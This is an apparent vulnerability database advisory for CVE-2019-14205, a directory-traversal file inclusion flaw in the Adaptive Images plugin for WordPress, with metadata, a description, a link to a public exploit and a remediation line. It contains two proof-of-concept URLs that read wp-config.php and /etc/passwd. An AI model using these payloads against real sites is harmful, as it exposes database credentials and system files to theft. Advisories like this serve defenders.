Main Vulnerability Database Exploits ID:2052 - Exploit for PHP file inclusion in Adaptive Images for WordPress - CVE-2019-14205

ID:2052 - Exploit for PHP file inclusion in Adaptive Images for WordPress - CVE-2019-14205

Published: March 18, 2020

Vulnerability identifier: #VU19312

Vulnerability risk: High

CVE-ID: CVE-2019-14205

CWE-ID: CWE-98

Exploitation vector: Remote access

Vulnerable software:
Adaptive Images for WordPress

Link to public exploit:

https://github.com/security-kma/EXPLOITING-CVE-2019-14205

Vulnerability description

The vulnerability allows a remote attacker to include arbitrary file on the system.

The vulnerability exists due to input validation error when processing directory traversal sequences passed via the "$_REQUEST['adaptive-images-settings']['source_file']" parameter in "adaptive-images-script.php". A remote attacker can set in an arbitrary way the file requested that will be served from the script.

PoC:

http://[host]/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://[host]/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd

Remediation

Install updates from vendor's website.

ID:2052 - Exploit for PHP file inclusion in Adaptive Images for WordPress - CVE-2019-14205

Link to public exploit:

Vulnerability description

Remediation

Please verify you're human